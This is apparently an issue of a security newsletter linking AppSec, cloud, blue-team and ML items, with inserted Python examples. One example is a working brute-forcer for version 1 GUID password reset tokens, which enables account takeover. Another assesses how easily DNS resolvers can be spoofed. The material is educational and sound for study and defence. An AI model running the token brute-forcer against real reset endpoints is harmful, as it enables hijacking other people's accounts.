Hey there,
I hope you've been doing well!
Saving the World
This week, on #PeakBayArea
Even more than making money or being profitable, it's key for Bay Area tech companies to have a grand vision.
Whether you're getting kids in the developing world clean water or, more likely, improving ad targeting, it's essential to disrupt and, as Silicon Valley rightly skewered, make the world a better place.
But it's not just tech companies that need to Be The Change. It's everyone.
Does your milk provide calcium and other healthy vitamins and minerals?
Weak. You gotta get on this milk that embodies environmental leadership or directly fights climate change, as you drink it!!
Sponsor
2022 Cloud-Native Threats
As organizations move to the cloud, cyberattackers have followed. While motives haven't changed, techniques have: cryptojacking, supply chain threats, and geopolitical hacktivism.
Did you know that for a cryptojacker to make $1, it costs the victim $53 in cloud bills?
Read Sysdig's blog for more insights and analysis on:
- Notorious cloud adversary: TeamTNT
- Supply chain attacks against containers
- Geopolitical conflict influences on attacker behavior
In this newsletter...
- AppSec: How to plan an SMS migration, you can brute force version 1 GUIDs, write Semgrep rules to quickly verify ideas
- Web Security: Generate an API client from OpenAPI, open source API security platform, DNS attacks on closed resolvers
- Cloud Security: Clean up unused AWS access keys, compute cost calculator, AWS permission boundaries for dummies, diving deeply into IAM policy evaluation
- Blue Team: Cloned website canarytoken, on trust and transparency in detection, stopping vulnerable driver attacks
- Politics / Privacy: Kanye buys Parler, UK spy chief says China's tech manipulations threaten all
- Machine Learning: GitHub Copilot lawsuit, prompt engineering resources, public database of AI generated images, Google project to generate video from text, automatically generate AI art using your own blog content, Microsoft product to use AI for social media graphics
- Misc: Super Mario Bros movie, meme search engine, archery tag, a vision for OWASP's future
AppSec
How to plan an SMS MFA migration that affects thousands of users
Twilio's Jordan Kohl describes how they
handled a tricky migration, including dealing with an external API and a
constantly changing production database, in a way that doesn't lock out users.
In GUID We Trust
Intruder's Daniel Thatcher describes how
you can brute force version 1 GUIDs if you know the approximate time the GUID
was generated, as well as the node ID and clock sequence of the generating
system (both of which you can read out of any other GUID the same system has
issued, such as your own). When GUIDs are used as password reset tokens, for
example, this can lead to account takeover.
Daniel also released a
tool to help with this attack and a
CTF challenge to practice on.
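To make the attack concrete, here is an added example (not Daniel's tool or code, and not part of the original post) that models it: a v1 GUID is just a 60-bit timestamp in 100 ns ticks since 1582-10-15, a 14-bit clock sequence and a 48-bit node ID. One GUID from the target (say, the attacker's own reset token) reveals the node ID and clock sequence, so a victim's token differs only in the timestamp, which lies in a small window around when the victim's reset was issued. All GUIDs, times, the node ID and the clock sequence below are constructed for the demo; the `is_valid` callback stands in for the real reset endpoint.

```python
"""Brute-forcing RFC 4122 version 1 GUIDs from a single known sample."""
import uuid
from typing import Callable, Iterator, Optional, Tuple

# 100 ns ticks between the Gregorian epoch (1582-10-15) and the Unix epoch.
GREGORIAN_TO_UNIX_100NS = 0x01B21DD213814000
TICKS_PER_SECOND = 10_000_000


def parse_v1(guid: str) -> Tuple[int, int, int]:
    """Return (timestamp_100ns, clock_seq, node) from a version 1 GUID."""
    u = uuid.UUID(guid)
    if u.version != 1:
        raise ValueError(f"{guid} is not a version 1 GUID")
    return u.time, u.clock_seq, u.node


def build_v1(timestamp: int, clock_seq: int, node: int) -> str:
    """Assemble the canonical string form of a v1 GUID (inverse of parse_v1)."""
    time_low = timestamp & 0xFFFFFFFF
    time_mid = (timestamp >> 32) & 0xFFFF
    time_hi_version = ((timestamp >> 48) & 0x0FFF) | (1 << 12)   # version 1
    clock_seq_hi_variant = ((clock_seq >> 8) & 0x3F) | 0x80       # RFC 4122 variant
    clock_seq_low = clock_seq & 0xFF
    return str(uuid.UUID(fields=(time_low, time_mid, time_hi_version,
                                 clock_seq_hi_variant, clock_seq_low, node)))


def unix_to_ticks(unix_seconds: float) -> int:
    """Convert a Unix time to the v1 timestamp scale."""
    return int(unix_seconds * TICKS_PER_SECOND) + GREGORIAN_TO_UNIX_100NS


def candidates(sample: str, victim_unix: float, window_seconds: float) -> Iterator[str]:
    """Every GUID the host that issued `sample` could have issued within +/- window."""
    _, clock_seq, node = parse_v1(sample)
    center = unix_to_ticks(victim_unix)
    half = int(window_seconds * TICKS_PER_SECOND)
    for ts in range(center - half, center + half + 1):
        yield build_v1(ts, clock_seq, node)


def brute_force(sample: str, victim_unix: float, window_seconds: float,
                is_valid: Callable[[str], bool]) -> Optional[str]:
    """Try each candidate against `is_valid` (in a real attack: the reset endpoint)."""
    for guid in candidates(sample, victim_unix, window_seconds):
        if is_valid(guid):
            return guid
    return None


# --- Constructed demo data (not real tokens) --------------------------------
NODE = 0x0050569B1C2D        # made-up MAC address of the issuing server
CLOCK_SEQ = 0x1A2B           # made-up clock sequence
T0 = 1_666_000_000.0         # attacker requests a reset for their own account

# Token the attacker receives for their own account: leaks NODE and CLOCK_SEQ.
ATTACKER_TOKEN = build_v1(unix_to_ticks(T0), CLOCK_SEQ, NODE)
# Victim's reset is triggered ~2 s later; the true issue time is 1.3 ms off
# from the attacker's estimate, which a 5 ms window comfortably absorbs.
VICTIM_TOKEN = build_v1(unix_to_ticks(T0 + 2.0013), CLOCK_SEQ, NODE)


def demo() -> Optional[str]:
    """Recover VICTIM_TOKEN knowing only ATTACKER_TOKEN and the approximate time."""
    return brute_force(ATTACKER_TOKEN, victim_unix=T0 + 2.0,
                       window_seconds=0.005,           # 100,001 candidates
                       is_valid=lambda g: g == VICTIM_TOKEN)


if __name__ == "__main__":
    print("leaked (timestamp, clock_seq, node):", parse_v1(ATTACKER_TOKEN))
    print("recovered victim token:", demo())
```

A 5 ms window is 100,001 requests; a 1 s window is 10 million, which is why the real attack hinges on pinning down the issue time (timestamps in server responses, or triggering the victim's reset yourself). The fix is not a tighter window: reset tokens should come from a CSPRNG, never from a v1 GUID.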
Semgrep: Writing quick rules to verify ideas
GitLab's Dominic Couture makes the case for
using Semgrep for quickly writing disposable rules to validate an idea when
reviewing code. Specifically, finding GET routes that contain state-changing
functionality (frameworks often don't protect against this by default). Using
this approach, he found and reported a real CSRF issue in Kibana!
What I'm looking for here are
path: "something"
patterns inside a router.get(...)
call, so I will express that in semgrep terms. The semgrep code is very close to the sentence I just wrote!
Web Security
Kiota
A CLI tool for generating an API client to call any OpenAPI described API. The
goal is to eliminate the need to take a dependency on a different API SDK for
every API that you need to call. Kiota API clients provide a strongly typed
experience with all the features you expect from a high quality API SDK, but
without having to learn a new library for every HTTP API.
metlo-labs/metlo
An open-source API security platform, by Metlo.
- Endpoint Discovery - Scans network traffic and creates an inventory of every API endpoint.
- Sensitive Data Scanning - Each endpoint is scanned for PII data and given a risk score.
- Vulnerability Discovery - Get alerts for issues like unauthenticated endpoints returning sensitive data, no HSTS headers, PII data in URL params, Open API spec diffs, and more.
Melting the DNS Iceberg: Taking over your infrastructure Kaminsky style
SEC Consultâs Timo Longin
and Clemens Stockenreitner describe attacking closed DNS resolvers, which you
can reach using SPF, DKIM, and DMARC. Tool release:
DNS-Analysis-Server.
By analyzing closed DNS resolvers on the Internet, we found numerous ISPs and hosting providers that are vulnerable to trivial Kaminsky attacks. This allows an attacker to manipulate the DNS name resolution of thousands of systems. As a consequence, e-mail redirections, account takeovers and even the compromise of entire systems may be possible.
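Here is an added example (mine, not SEC Consult's DNS-Analysis-Server, and not from the original post) of the analysis side of that setup. It assumes you run the authoritative name server for a probe domain, trigger lookups through a target's closed resolver (for instance by sending mail whose SPF, DKIM and DMARC records live under that domain), and log each query's source IP, source port and transaction ID. From those logs it estimates how many forged replies a blind spoofer would need to match one query, which is what a Kaminsky attack races against: a resolver that does not randomize its source port leaves only the 16-bit TXID to guess. The log format, the resolver IPs and every line below are constructed.

```python
"""Spotting Kaminsky-spoofable resolvers from the queries they send a probe server."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed log format: "<ts> <resolver-ip>:<src-port> txid=0x<hex> q=<qname>"
LOG_RE = re.compile(
    r"^\S+ (?P<ip>[\d.]+):(?P<port>\d+) txid=0x(?P<txid>[0-9a-f]{1,4}) q=\S+$"
)
ID_SPACE = 1 << 16            # both the source port and the TXID are 16-bit fields


@dataclass
class Verdict:
    resolver: str
    queries: int
    distinct_ports: int
    distinct_txids: int
    sequential_txids: bool
    guess_space: int          # (port, txid) pairs a spoofer must cover to match a query
    vulnerable: bool


def parse(lines: Iterable[str]) -> Dict[str, List[Tuple[int, int]]]:
    """Group (source port, txid) pairs by resolver IP; non-matching lines are skipped."""
    seen: Dict[str, List[Tuple[int, int]]] = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            seen[m["ip"]].append((int(m["port"]), int(m["txid"], 16)))
    return dict(seen)


def is_sequential(values: List[int]) -> bool:
    """True when every value is the previous one plus one (mod 2^16)."""
    return len(values) >= 2 and all((b - a) % ID_SPACE == 1 for a, b in zip(values, values[1:]))


def effective_space(values: List[int]) -> int:
    """Heuristic size of the space a spoofer must guess for one 16-bit field.

    A strictly incrementing sequence is predictable (1 guess); an all-distinct
    sample is treated as randomized (full 16 bits); anything else is bounded
    below by the number of distinct values observed.
    """
    if is_sequential(values):
        return 1
    distinct = len(set(values))
    return ID_SPACE if distinct == len(values) else distinct


def assess(resolver: str, observations: List[Tuple[int, int]],
           min_queries: int = 8) -> Optional[Verdict]:
    """Judge one resolver; None if there are too few queries to say anything."""
    if len(observations) < min_queries:
        return None
    ports = [p for p, _ in observations]
    txids = [t for _, t in observations]
    guess_space = effective_space(ports) * effective_space(txids)
    return Verdict(
        resolver=resolver, queries=len(observations),
        distinct_ports=len(set(ports)), distinct_txids=len(set(txids)),
        sequential_txids=is_sequential(txids), guess_space=guess_space,
        # With a single 16-bit field left to guess, a few thousand forged
        # replies per query win the race in minutes: the Kaminsky condition.
        vulnerable=guess_space <= ID_SPACE,
    )


def analyze(lines: Iterable[str]) -> List[Verdict]:
    """Run assess() over every resolver found in the log."""
    verdicts = []
    for ip, obs in sorted(parse(lines).items()):
        v = assess(ip, obs)
        if v is not None:
            verdicts.append(v)
    return verdicts


def _log(ip: str, pairs: List[Tuple[int, int]]) -> List[str]:
    """Render constructed probe-server log lines for one resolver."""
    return [f"2022-10-18T10:00:{i:02d}Z {ip}:{p} txid=0x{t:04x} q=_dmarc.{i}.probe.example.test"
            for i, (p, t) in enumerate(pairs)]


SAMPLE_LOG = (
    # fixed source port 53, random TXIDs: only 2^16 guesses for a spoofer
    _log("198.51.100.10", [(53, t) for t in (0x4A2F, 0x91C0, 0x0D3E, 0x7B11,
                                             0xE802, 0x33F7, 0xC5A9, 0x5E64)])
    # random ports and random TXIDs: about 2^32 guesses
    + _log("203.0.113.25", [(54021, 0x1B7D), (33190, 0xA4E2), (61077, 0x5C09), (41558, 0xF3B6),
                            (50233, 0x2E70), (36904, 0x88D1), (58812, 0x6A1F), (44375, 0xD94C)])
    # random ports but TXIDs that count up: the TXID is free, the port alone is 2^16
    + _log("192.0.2.77", [(p, 0x1000 + i) for i, p in enumerate(
        (40101, 52377, 33819, 60442, 47280, 38955, 55063, 42618))])
)

if __name__ == "__main__":
    for v in analyze(SAMPLE_LOG):
        print(v)
```

Eight queries per resolver is the floor here so that "all distinct" means something; in practice you want hundreds, plus a check that the resolver actually sent the queries itself rather than forwarding through an upstream whose port behaviour you are really measuring.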

Cloud Security
tuladhar/cleanup-aws-access-keys
A cloud security tool to search and clean up unused AWS access keys, written in
Go, by Puru Tuladhar.
Compute Cost Calculator
By Eric Wastl: Find the lowest price of compute
resources from different AWS services given some criteria, like RAM or CPUs.
AWS Permission Boundaries for Dummies
Great overview by FireMon's Rich Mogull.
TL;DR: Regular IAM policies let you do things, but can also stop you from doing things. Permission boundaries only stop you from doing things. You mostly use them to let someone administer some IAM stuff but not so much IAM stuff that they can escalate privileges (for themselves or someone else). They are a failsafe. If you let someone manage IAM in an account and don't want them to be able to escalate privileges, you almost always need a permission boundary!
Diving Deeply into IAM Policy Evaluation
Ermetic's Noam Dahan provides a great overview of the AWS re:Inforce session by AWS Sr. Solutions Architect Matt Luttrell and AWS Sr. Software Engineer for IAM Access Analyzer Dan Peebles. The talk delves into some of AWS IAM's most arcane edge cases, and why they behave as they do. The session took a deep dive into AWS IAM internal evaluation mechanisms never shared before and revealed a new model for representing the AWS permission evaluation process. So many GIFs of flow charts.
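To pin down the "boundaries only stop you" rule from Rich's post and the evaluation order from the talk, here is an added example (my code, not AWS's and not from either post). It is a toy evaluator covering only the part of the logic discussed above for an IAM user acting in its own account: an explicit Deny in any applicable policy wins, a permissions boundary can only narrow what the identity policies grant, and nothing is allowed unless an identity policy allows it. Conditions, NotAction/NotResource, resource-based policies, SCPs and session policies are deliberately left out. The policies and ARNs are constructed.

```python
"""Toy evaluator for identity policies combined with a permissions boundary."""
from fnmatch import fnmatchcase
from typing import Dict, Iterable, NamedTuple, Optional

Policy = dict  # an IAM policy document as a Python dict


class Decision(NamedTuple):
    allowed: bool
    reason: str


def _as_list(value) -> list:
    return value if isinstance(value, list) else [value]


def _statement_matches(stmt: dict, action: str, resource: str) -> bool:
    """Does this statement cover the request? Actions match case-insensitively."""
    actions = [a.lower() for a in _as_list(stmt["Action"])]
    resources = _as_list(stmt.get("Resource", "*"))
    return (any(fnmatchcase(action.lower(), a) for a in actions)
            and any(fnmatchcase(resource, r) for r in resources))


def evaluate_policy(policy: Policy, action: str, resource: str) -> str:
    """'Deny' if a matching statement denies, else 'Allow' if one allows, else 'Implicit'."""
    result = "Implicit"
    for stmt in _as_list(policy["Statement"]):
        if _statement_matches(stmt, action, resource):
            if stmt["Effect"] == "Deny":
                return "Deny"
            result = "Allow"
    return result


def is_allowed(action: str, resource: str, identity_policies: Iterable[Policy],
               boundary: Optional[Policy] = None) -> Decision:
    identity = [evaluate_policy(p, action, resource) for p in identity_policies]
    # 1. An explicit Deny in any applicable policy ends the evaluation.
    if "Deny" in identity:
        return Decision(False, "explicit deny in identity policy")
    if boundary is not None:
        b = evaluate_policy(boundary, action, resource)
        if b == "Deny":
            return Decision(False, "explicit deny in permissions boundary")
        # 2. A boundary never grants anything; it must *also* allow the action.
        if b != "Allow":
            return Decision(False, "outside permissions boundary")
    # 3. Only an identity policy can actually grant access.
    if "Allow" not in identity:
        return Decision(False, "implicit deny: no identity policy allows it")
    return Decision(True, "allowed by identity policy" + (" within boundary" if boundary else ""))


# Constructed demo: a junior IAM admin who may create users and use S3, but
# must not be able to escalate by attaching arbitrary policies.
IDENTITY_POLICIES = [{
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:*", "s3:*"], "Resource": "*"},
        {"Effect": "Deny", "Action": "s3:DeleteBucket", "Resource": "*"},
    ],
}]
BOUNDARY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Resource": "*",
         "Action": ["s3:*", "iam:CreateUser", "iam:ListUsers", "ec2:DescribeInstances"]},
        # Belt and braces: never let them strip a boundary from anyone.
        {"Effect": "Deny", "Action": "iam:*PermissionsBoundary", "Resource": "*"},
    ],
}


def demo() -> Dict[str, Decision]:
    """Evaluate a handful of requests against the constructed policies."""
    bucket = "arn:aws:s3:::example-bucket/report.csv"
    checks = [("s3:GetObject", bucket), ("s3:DeleteBucket", "arn:aws:s3:::example-bucket"),
              ("iam:CreateUser", "*"), ("iam:AttachUserPolicy", "*"),
              ("iam:DeleteUserPermissionsBoundary", "*"), ("ec2:DescribeInstances", "*")]
    return {action: is_allowed(action, res, IDENTITY_POLICIES, BOUNDARY)
            for action, res in checks}


if __name__ == "__main__":
    for action, decision in demo().items():
        print(f"{action:40} {'ALLOW' if decision.allowed else 'DENY ':5} ({decision.reason})")
```

Two of the results are the whole point: ec2:DescribeInstances is denied even though the boundary allows it (a boundary grants nothing), and iam:AttachUserPolicy is denied even though iam:* is in the identity policy (the boundary is the failsafe against that escalation path). Drop the boundary argument and the second one flips to allowed.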
Sponsor
Drop that Cloud Zero for a Cloud Hero!
We at Permiso love our bold statements and definitely our 90s references (can you guess it?). Do you have an army of cloud heroes building detections and responding to cloud breaches in your environment? If so, then we're not the solution for you!
However, if you need help from experts who know how to find "evil" in cloud, we're your Cloud Heroes! If you don't believe us, just check out our research and disclosures on our blog to get a glimpse of our unique insights and why we're the Cloud Heroes for you! We're also offering a free Cloud Compromise Assessment with no strings attached (except maybe talking to one of our CEOs!). If you just want to reminisce about the 90s, that's fair game too!
Talk to a Cloud Hero
Blue Team
Cloned Website Token
By Thinkst Canary: Place this canary token
within the JavaScript of your websites and it notifies you if someone clones
your site and hosts it on another domain, which is often done in targeted
phishing attacks.
On Trust and Transparency in Detection
Interesting reflections by Anton Chuvakin
and Oliver Rochford on the history and
future of detection logic being transparent, explainability vs
understandability, accuracy, and more.

Stopping Vulnerable Driver Attacks
Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products. Elastic's Joe Desimone describes how Elastic Security has released 65 YARA rules to detect vulnerable driver abuse.
Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the "New Terms" rule type, which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc.) is observed for the first time.
This empowers security teams to quickly surface unusual drivers the first time they're seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.
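Here is an added example (mine, not Elastic's implementation of the New Terms rule type, and not from the post) of the detection idea: keep the last time each value of a field (driver hash, signer, ...) was seen and alert when an event carries a value not seen within the history window. The events, driver names, signer names and hashes below are constructed placeholders, and the field names only loosely follow ECS.

```python
"""A 'new terms' detection run over constructed driver-load events."""
from datetime import datetime, timedelta
from typing import Dict, Hashable, Iterable, List, NamedTuple


class Alert(NamedTuple):
    timestamp: datetime
    field: str
    term: Hashable
    event: dict


def new_terms(events: Iterable[dict], field: str,
              history_window: timedelta = timedelta(days=30)) -> List[Alert]:
    """Alert on the first sighting of each `field` value within the history window.

    Events are processed in timestamp order. A term last seen longer than
    `history_window` ago counts as new again: the window is the detector's
    memory, which keeps a long-dormant driver from being silently trusted.
    """
    last_seen: Dict[Hashable, datetime] = {}
    alerts: List[Alert] = []
    for event in sorted(events, key=lambda e: e["@timestamp"]):
        term = event.get(field)
        if term is None:
            continue                      # event does not carry the field
        ts = event["@timestamp"]
        prev = last_seen.get(term)
        if prev is None or ts - prev > history_window:
            alerts.append(Alert(ts, field, term, event))
        last_seen[term] = ts
    return alerts


def _ev(day: str, name: str, signer: str, sha256: str) -> dict:
    """Build one constructed driver-load event."""
    return {"@timestamp": datetime.fromisoformat(day), "event.action": "load",
            "driver.name": name, "driver.signer": signer, "driver.hash": sha256}


# Constructed telemetry; the hashes are placeholders, not real drivers.
SAMPLE_EVENTS = [
    _ev("2022-10-01", "storage.sys", "Vendor A", "sha256:aaaa0001"),
    _ev("2022-10-02", "storage.sys", "Vendor A", "sha256:aaaa0001"),
    _ev("2022-10-15", "gpuhelper.sys", "Vendor B", "sha256:bbbb0002"),
    _ev("2022-10-16", "gpuhelper.sys", "Vendor B", "sha256:bbbb0002"),
    _ev("2022-10-20", "storage.sys", "Vendor A", "sha256:aaaa0003"),  # same signer, new build
    _ev("2022-11-30", "storage.sys", "Vendor A", "sha256:aaaa0001"),  # old hash, silent > 30 days
]


def demo() -> List[Alert]:
    """Alert on driver hashes never seen in the last 30 days."""
    return new_terms(SAMPLE_EVENTS, "driver.hash")


if __name__ == "__main__":
    for a in demo():
        print(a.timestamp.date(), a.field, a.term, a.event["driver.name"])
```

Running it on `driver.hash` gives four alerts (the first load of each hash, plus the old hash returning after 59 quiet days); on `driver.signer` it gives three, so the same events can feed several rules keyed on different terms, which is how a new hash under a known signer still surfaces. In production the interesting part is the first run: everything is "new" until the history is warm, so seed the window from existing data before alerting.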
Politics / Privacy
Ye, formerly known as Kanye West, to acquire Parler platform
Kanye was recently booted from Twitter for antisemitic comments. Also, is this real life?
Fear driving Chinaâs tech manipulation poses threat to all
China is using its financial and scientific muscle to manipulate technologies in a manner that risks global security, Britain's top cyber spy will say on Tuesday, warning that Beijing's actions could represent "a huge threat to us all."
In a speech, Jeremy Fleming, director of the GCHQ spy agency, will say that the Chinese leadership was seeking to use technologies such as digital currencies and its Beidou satellite navigation network to tighten its grip over its citizens at home, while spreading its influence abroad.
Machine Learning
GitHub Copilot investigation
Description of a lawsuit being filed against GitHub Copilot, claiming it violates its legal duties to open-source authors and end users.
Maybe you don't mind if GitHub Copilot used your open-source code without asking. But how will you feel if Copilot erases your open-source community?
sw-yx/prompt-eng
Shawn Wang shares a ton of resources for prompt
engineering on (mostly) Stable Diffusion, DALL-E 2, and Midjourney.
Arthub.ai
Explore AI generated designs, images, art and prompts by top community artists
and designers. Some seriously cool photos.
Imagen Video
New release from Google Research's Brain Team that generates video based on
a text description.
Generate AI Art Using Your Own Writing
Super cool post by Daniel Miessler that
describes how to take the text of a blog post, auto-summarize it into a prompt
(for DALL-E 2, Stable Diffusion, Midjourney), and then use the prompt to
generate art for the post. Such a neat read.
Microsoft Designer - Create stunning designs in a flash
New product by Microsoft aimed at making it easier to create graphics for social
media and other everyday uses, powered by DALL-E 2. You can generate a totally
custom image, or start from a template or stock image, add your own content
(photo, logo, messaging), and more.
Also, everybody needs to relax sometimes.
Misc
The Super Mario Bros. Movie - Official Teaser Trailer
It's-a me, franchise money-oh!
FindThatMeme
Search millions of memes from across the web in seconds. You can search by text
in the meme, or by providing a meme you want to find similar memes to.
Archery Tag
Last week I called out DodgeBow, and lamented that it's only in Montreal. Soon
after, Rami McCarthy let me know about
Archery Tag, which appears to be a similar idea, with many more locations!
My Manifesto for the OWASP Board Election
Mark Curphey paints an interesting
picture for where OWASP could head. I'm not endorsing (or not endorsing) these
points, but in general, I like people dreaming big. Mark recommends:
- Changing the funding model - instead of running mostly on personal membership fees, raise money from large corporate sponsors and government grants, like the CNCF and OpenSSF.
- Creating an OWASP Investment Fund - invest like a VC in companies built around OWASP projects.
- Clarifying the mission statement, reducing bureaucracy, clarifying community values, and more.
Wrapping Up
Have questions, comments, or feedback? Just reply directly, I'd love to hear from you.
If you find this newsletter useful and know other people who would too, I'd really appreciate it if you'd forward it to them.
Thanks for reading!
Cheers,
Clint
@clintgibler